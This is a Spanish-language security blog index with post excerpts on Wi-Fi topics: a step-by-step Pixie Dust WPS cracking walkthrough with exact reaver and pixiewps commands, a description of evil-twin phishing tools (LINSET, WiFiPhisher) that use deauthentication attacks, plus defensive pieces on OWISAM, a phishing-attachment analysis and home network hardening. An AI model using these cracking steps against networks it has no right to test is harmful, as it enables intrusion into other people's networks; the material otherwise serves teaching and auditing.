Rompiendo redes Inalámbricas WPA y WPA2 con WPS en segundos
may05

Rompiendo redes Inalámbricas WPA y WPA2 con WPS en segundos

Gracias a la reciente investigación de Dominique Bongard, ahora es posible romper el famoso WPS (Wi-Fi Protected Setup), que tradicionalmente se ha tardado desde 2 horas hasta 12 o más horas en arrojarnos la clave de redes WPA o WPA2…. para pasar a romper WPS en solo segundos, realizando un ataque de fuerza bruta de forma offline denominado “ataque de polvo de hadas” o Pixie Dust Attack. Lo que Dominique ha descubierto e hizo publico en la pasada versión de la conferencia Hacklu2014 en Luxemburgo, es que algunas marcas de routers, en especial sus chipsets (aquí el listado completo de fabricantes vulnerable, que se actualiza constantemente con reportes de los usuarios), tienen un problema en el generador de números aleatorios que utilizan entropia muy baja y permite adivinar este numero usado como semilla en el algoritmo por fuerza bruta. Aunque el Suizo no publicó su investigación con una herramienta para explotar el fallo, los detalles técnicos que ha expuesto en su charla (ver vídeo de la charla) han sido tan específicos, que existen ya varias herramientas que nos permiten realizar el ataque Pixie Dust, siendo la más popular hasta el momento la herramienta generada por el usuario wiire del foro de Kali Linux llamada pixiewps. Rompiendo redes Inalámbricas WPA o WPA2 con WPS en segundos Después de instalar las dependencias de la herramienta sudo apt-get install libssl-dev Descargargamo y compilamos el código ~/pixiewps$ cd src ~/pixiewps/src$ make ~/pixiewps/src$ sudo make install Tenemos el pixiewps listo, pero para poder sacar los datos que necesita como parámetros para trabajar, necesitamos saber ciertos datos del objetivo, que podemos sacar con wash para ver los APs con WPS activo… wash -i interfaceModoMonitor o usar un script como wifite con el parámetro -wps para identificar la mac y el canal de los AP que tengan WPS wifite -wps Luego debemos pasar el canal y la mac de la red a auditar como parámetro a una versión de reaver modificada para solo lectura apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip -O reaver.zip unzip reaver.zip cd reaver-wps-fork-t6x-master/src/ chmod 777 ./configure ./configure make sudo make install Corremos el reaver modificado con los siguientes parámetros reaver -i INTERFACEMODOMONITOR -c CANAL -b MACROUTEROBJETIVO -vv -S Finalmente con los datos que nos ha arrojado el reaver, le pasamos los siguientes parámetros al pixiewps pixiewps -e numeroPKE -s numeroE-Hash1 -z numeroE-Hash2 -a numeroAuthKey -S Si todo sale bien y el objetivo hace parte de los dispositivos con el problema te saldrá el PIN como resultado en pantalla. Solo debes meter ese pin como parámetro de nuevo al reaver, para que usando el PIN solicite la clave de la red WPA...

Leer Más
Crackeando redes WPA y WPA2 sin diccionario
ene05

Crackeando redes WPA y WPA2 sin diccionario

Utilizar ingeniería social para crackear redes WPA y WPA2 sin diccionario no es una técnica nueva, pero como con casi toda técnica cuando se automatiza y se facilita su uso se incrementa su popularidad (¿alguien recuerda firesheep?), hoy varios medios se han hecho eco de la herramienta WiFiPhisher publicada en el sitio The Hacker News y la anuncian como si se tratara de una gran novedad. Lo que seguramente desconocen es que ya existían este tipo de herramientas hace años e incluso herramientas creadas por latinos como LINSET (Linset Is Not a Social Enginering Tool) del usuario vk496 de la comunidad SeguridadWireless supera con creses las prestaciones del ya famoso WiFiPhisher. ¿Como crackear redes WPA y WPA2 sin diccionario usando estos scripts? El funcionamiento de todos los scripts de este tipo es básicamente el mismo y siguen el siguiente proceso: Escanea la red buscando redes cercanas. Nos arrojan el listado de redes disponibles (algunos filtran solo redes WPA y WPA2 otros no). Después de seleccionar la red, intenta capturar el handshake (algunos permiten el uso sin el handshake) Con el handshake se crea un falso ap con el mismo nombre que el original y se lanza un ataque DoS a los clientes conectados (buscando que se conecten al falso ap) El script monta un server DHCP sobre la red falsa para que cada petición que haga la victima lo mande a un portal cautivo donde se pregunta la clave (algunos personalizan este portal según la marca del router victima) Se verifica que la contraseña ingresada sea la correcta comparándola con el handshake (algunos permiten capturar simplemente la petición enviada) Si la clave es correcta se detiene el ataque DoS, se baja el servidor web/DHCP y el falso AP y los usuarios pueden volverse a conectar al AP real. El script limpia los temporales creados, limpia iptables, detiene los servicios y deja el sistema como antes de ejecutarse. ¿Por que usar LINSET para crackear redes WPA y WPA2 sin diccionario? Esta escrito nativamente en español Es un solo archivo en el que ingeniosamente incluyen otros (al igual que en las viejas eZines) Tiene soporte de una comunidad (SeguridadWireless) Identifica el fabricante del router y si tiene una pagina para ese fabricante la selecciona Tiene varios idiomas para los portales cautivos Utiliza varios métodos para capturar el handshake Tiene mas tiempo de desarrollo y esta mas maduro Esta integrada en nuestro curso De 0 a Ninja en Seguridad Inalámbrica Descargar LINSET para crackear redes WPA y WPA2 sin diccionario ¿Por que usar WiFiPhisher para crackear redes WPA y WPA2 sin diccionario? Instala automáticamente las dependencias que hacen falta Al tener los...

Leer Más
OWISAM, Open Wireless Security Assessment Methodology
abr22

OWISAM, Open Wireless Security Assessment Methodology

OWISAM es una metodología abierta para el análisis de seguridad Wireless que busca llenar el vació actual en cuanto mejores prácticas a la hora de realizar una auditoría de una red inalámbrica. Esta metodología fue creada el año pasado por Andrés Tarasco y Miguel Tarasco, dos hermanos españoles que se han echado al hombro este proyecto y que han sabido sacarlos adelante con una comunidad activa y en constante crecimiento. Conozco el proyecto desde que se publicaron los vídeos de la pasada RootedCON 2013 y la verdad me llamó muchísimo la atención, tanto que me vi obligado en incluir esta metodología en el curso De 0 a Ninja en Seguridad Inalámbrica (que en aquella época se llamaba “Taller Practico de Seguridad Inalámbrica“) pero no fue hasta hoy, por un correo que recibí de un estudiante al que le di clases en un post-grado de seguridad informática y al progreso que ha tenido el proyecto OWISAM, que me animé a sacar esta entrada. El correo en cuestión decía algo como: Profe, en la empresa en la que trabajo me han pedido medir la seguridad inalámbrica de la sede principal y todas las sucursales, yo sé que pasos seguir pero me están pidiendo medir el riesgo de cada red para darle prioridad a la configuración de las más vulnerables, yo sé que fallos son graves pero no sé cómo se mide ¿riesgo bajo, medio, alto?. Son más de 200 puntos y este trabajo me va a llevar varias semanas, existe alguna guía o herramienta que me pueda compartir para agilizar este trabajo?. En ese momento, para resolver la duda que me planteaban, ingresé a la página de OWISAM para buscar el link del “Common Wireless Security Scoring” y me he encontrado una agradable sorpresa, el proyecto no solo estaba vivo, sino que contaba con mucha más documentación, en varios idiomas y ya se habían publicado las herramientas que prometían en la charla. El OWISAM Top 10, que define los principales riesgos de seguridad en las redes inalámbricas se ha consolidado y definido: OWISAM-TR-001: Red de comunicaciones Wi-Fi abierta. OWISAM-TR-002: Presencia de cifrado WEP en redes de comunicaciones. OWISAM-TR-003: Algoritmo de generación de claves del dispositivo inseguro (contraseñas y WPS). OWISAM-TR-004: Clave WEP/WPA/WPA2 basada en diccionario. OWISAM-TR-005: Mecanismos de autenticación inseguros (LEAP,PEAP-MD5,..) OWISAM-TR-006: Dispositivo con soporte de Wi-Fi protected setup PIN activo (WPS). OWISAM-TR-007: Red Wi-Fi no autorizada por la organización. OWISAM-TR-008: Portal hotspot inseguro. OWISAM-TR-009: Cliente intentando conectar a red insegura. OWISAM-TR-010: Rango de cobertura de la red demasiado extenso. La metodología, la lista de controles y las métricas de puntaje (aunque estén incompletas) son de gran ayuda a la hora...

Leer Más
Robo de contraseñas con formularios online
abr20

Robo de contraseñas con formularios online

El SPAM sigue siendo el “gran” problema de Internet. Los proveedores de correo electrónico trabajan duramente para que nos llegue la menor cantidad de correos electrónicos que son basura y que lo único que nos aporta normalmente es, malware, suscripciones a mas servicios de SPAM o similares, ofertas fraudulentas, ataques de phishing etc… En el caso de hoy tenemos el típico correo que nos llega con un texto, en el que nos anima a validar nuestra cuenta. Para ello, y para nuestra comodidad (nótese el toque irónico) nos proporciona un archivo adjunto. Vamos a echarle un vistazo: Es un archivo HTM, bastante sencillo y claro de lo que hace. Nos solicita el email y el password le da igual el proveedor.  Incluso nos hace verificar el password por si acaso nos equivocamos y cuando verificamos la cuenta. Por POST envía los datos a un PHP que se llama SendMail, por lo que este a su vez imagino enviará un correo al administrador del sitio. Como suele pasar con estos timos cuando he querido “atacar” al fichero sendmail => seifreed@hell:~/Escritorio$ curl -I http://emailupgrades.ucoz.com/_sendmail.php HTTP/1.1 404 Not Found Server: uServ/3.2.2 Date: Mon, 21 Apr 2014 01:07:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6933 Connection: keep-alive Keep-Alive: timeout=15 ETag: “5342af3b-1b15” Así que me quedado sin el fichero. No es novedad que los malos reutilizan infraestructura para montar varios servicios a lo largo del tiempo. No todas las webs que monten han de ser con fines maliciosos pero la historia no dista de ser siempre muy parecida. Si consultamos un registro de DNS pasivo para ver que webs se montaron sobre la IP de este fraude: Status: IP address found in dataset [+] Lastest domain resolved +———————+————————–+ |    last_resolved    |         hostname         | +=====================+==========================+ | 2014-04-18 00:00:00 | mailre-validate.ucoz.ua  | +———————+————————–+ | 2014-04-18 00:00:00 | prowallpapers.info       | +———————+————————–+ | 2014-04-18 00:00:00 | servicehelpdesk.clan.su  | +———————+————————–+ | 2014-04-17 00:00:00 | exchangeweboowa.ucoz.ae  | +———————+————————–+ | 2014-04-17 00:00:00 | hoerspielstube.ucoz.com  | +———————+————————–+ | 2014-04-16 00:00:00 | aknrtxb.ucoz.co.uk       | +———————+————————–+ | 2014-04-16 00:00:00 | bershadmoloko.at.ua      | +———————+————————–+ | 2014-04-16 00:00:00 | endigo.ucoz.ru           | +———————+————————–+ | 2014-04-16 00:00:00 | gdz-work.3dn.ru          | +———————+————————–+ | 2014-04-16 00:00:00 | maup.ucoz.net            | +———————+————————–+ | 2014-04-16 00:00:00 | morebareclips.com        | +———————+————————–+ | 2014-04-15 00:00:00 | clickweb.ucoz.ru         | +———————+————————–+ | 2014-04-15 00:00:00 | gtwaehkn.ucoz.com        | +———————+————————–+ | 2014-04-15 00:00:00 | images-droles.ucoz.com   | Podemos encontrar el contenido completo en Pastebin Como veis la IP ha tenido bastante actividad. Además de comprobar estos datos en el pDNS de Virus Total, podemos lanzar Automater para tener mas datos sobre el dominio: ____________________     Results found for: emailupgrades.ucoz.com     ____________________ [+] Fortinet URL Category: Information Technology [+] URL redirects to: http://emailupgrades.ucoz.com [+]...

Leer Más
Li-Fi ¿preparados para otro cambio de tecnología?
dic10

Li-Fi ¿preparados para otro cambio de tecnología?

Jaime, no solo me pidió que escribiera un post sobre deep web hace un tiempo ya, sino que además me reclamo por haber escrito primero en SecurityByDefault y ElLadoDelMal así que me hizo prometer enviar uno antes de Navidad, por lo que cumplo con ofrecer un escrito mío antes que la ira recaiga en mí y se me acuse indebidamente ;-P Después de tantos años en el sector, uno no deja de sorprenderse con los avances tecnológicos y lo maravillosamente hermoso de esto, es que ese avance nos obliga a estudiar continuamente, motivo por el cual, si no nos apasionara lo que hacemos éste trabajo sería terriblemente malo, pero como además es nuestro hobby, no podemos dejar de estar atentos a las cosas nuevas. Imagen 1, 1993 vs 2013 (imagen vista en twitter de @historiasenfotos) Como seguramente lo hacen muchos lectores de este blog, suelo tener conversaciones con amigos que podrían considerarse bien de nerds, esas del tipo: Hola, viste lo nuevo que salió de la cosa FFFFFF?? Todo bien? Siiii (o: nooo), que loco el tema! Increíble! Bueno, nos vemos pronto! Me alegro de verte bien! Este tipo de charla tan neurótica de por sí, funciona como una especie de RSS de la vida real en los encuentros callejeros con los amigos.  Estos breves segundos que un especialista describiría como el “proceso de la incomunicación”,  para nosotros no es más que esos segundos de inspiración que encienden una chispa interna para ir a ver qué más hay sobre ese tema.   En unos de esos instantes inspiradores en un encuentro con un viejo amigo, su pregunta fue dirigida a si conocía Li-Fi, mi cara de desconocimiento y sorpresa fue tan evidente que él me dijo: El nuevo desarrollo para la transmisión Wi-Fi a través de un bombita de luz (un foco). Acto seguido, y cumpliendo con nuestro estándar de comunicación, nos despedimos y me puse a averiguar sobre el tema, y me encontré con un proyecto fascinante, aunque aún no lo suficientemente maduro desde mi punto de vista. Imagen 2, Foco de LED Li-Fi, proveniente de Light-Fidelity, es una tecnología de hasta 100 veces menor costo que los tradicionales Wi-Fi y se basa en la transmisión de comunicaciones inalámbricas a partir de diodos emisores de luz (los famosos LED que usamos en muchos lados, hasta en los controles remotos).    En varios artículos que leí, algunas personas lo confunden con productos que se ofrecen por ejemplo para encender/apagar la luz desde un smartphone, sin embargo, esos proyectos utilizan tecnología Wi-Fi o Bluetooth para su funcionamiento, mientras que el proyecto de Li-Fi sugiere brindar soluciones a la sobre utilización del espectro...

Leer Más
Cómo proteger nuestra red inalambrica de un “vecino hacker”
nov08

Cómo proteger nuestra red inalambrica de un “vecino hacker”

La ultima charla que he dado en la pasada Campus Party Colombia 2013 titulada “mi vecino hacker”, ha tenido muy buena aceptación en el público en general, muy posiblemente por ser una situación que cualquier persona puede vivir en el día a día o porque en el fondo todos sospechamos alguna vez de nuestro vecino; El caso es que esto ha causado una real avalancha de preguntas vía mail a mi casilla de correo, de personas preocupadas de la seguridad en sus redes inalámbricas. En esta nota trataré de dar respuestas a todas las preguntas que me han realizado en dichos mails y explicar “como protegerse de un vecino hacker”, ya que en Colombia y muchos países de Latinoamérica son los mismos proveedores de internet los responsables de dejarnos desprotegidos, con configuraciones por defecto, mala política de contraseñas y hasta capando los dispositivos para que nosotros no podamos cambiar estos problemas. Recomendaciones de seguridad en redes inalámbricas caseras: Desde hace más de una década el cifrado WEP está roto, por lo que la primera recomendación es evitar su uso. Inicialmente WPS (Wi-Fi Protected Setup) se diseñó para facilitar a los usuarios la configuración segura de sus dispositivos, pero recientemente se encontró la forma de atacarlo por fuerza bruta (como lo comentamos en la comunidad), lo que permite a un atacante, en pocas horas, tener acceso a tu contraseña sin importar la complejidad de esta, por tanto su desactivación es más que recomendada. Configurar la red con WPA o WPA2 con AES y una contraseña fuerte, lo que nos lleva a la siguiente recomendación. Utiliza contraseñas fuertes, siempre he dicho que una buena clave es la que es fácil de recordar y difícil de adivinar, muchos ponen en práctica esos consejos y toman por ejemplo una frase de su canción preferida, le suman unas cuantas comas y números para conseguir algo como “avecesmesientoenelshowdetruman;123” fácil de recordar y seguramente muy difícil de adivinar, otros en cambio preferieren que una maquina les genere una buena contraseña, para esto existen muchos servicios, uno  de los más populares es lastpass.com porque permite, además de generar la clave, administrarlas con un buen nivel de seguridad, implementar un factor de doble autenticación, generar contraseñas desechables y un largo número de funcionalidades que terminan cautivando al usuario, además en el pasado han demostrado transparencia y aceptado sus errores lo que se agradece siempre. (Cualquier otra empresa simplemente lo negaría) Hasta aquí tenemos la configuración básica que toda red casera debería tener, ahora empezaremos a realizar un poco de hardening o procesos adicionales para dificultar aún más la tarea a un posible “vecino hacker”. Las tareas primordiales a...

Leer Más

Congreso Hacker Colombia

Aprende ONLINE Técnicas HACKING y Seguridad Informática guiad@ por Profesionales RECONOCIDOS con más de 10 años de experiencia REAL en el campo de la Seguridad Informática

Toma acción !AHORA¡
miles ya lo han hecho

NUNCA te enviaremos spam.

  • No necesitas conocimiento previo (De 0 a Ninja)
  • Docentes reconocidos en el medio y con experiencia REAL
  • Clases ONLINE en VIVO que luego podrás repasar si lo deseas desde cualquier parte o cualquier dispositivo
  • Contenidos EXCLUSIVOS generados por nuestros docentes
  • Contacto constante con el docente por distintos medios, antes, durante y después de las clases
  • Laboratorios en linea para que nuestros alumnos practiquen sus conocimientos sin problemas
  • Exclusivo FORO VIP de Alumnos y Ex-Alumnos donde se continúa el aprendizaje y se comparte conocimiento
  • Te entregamos un diploma de certificación por cada curso
  • Miles de ex-alumnos felices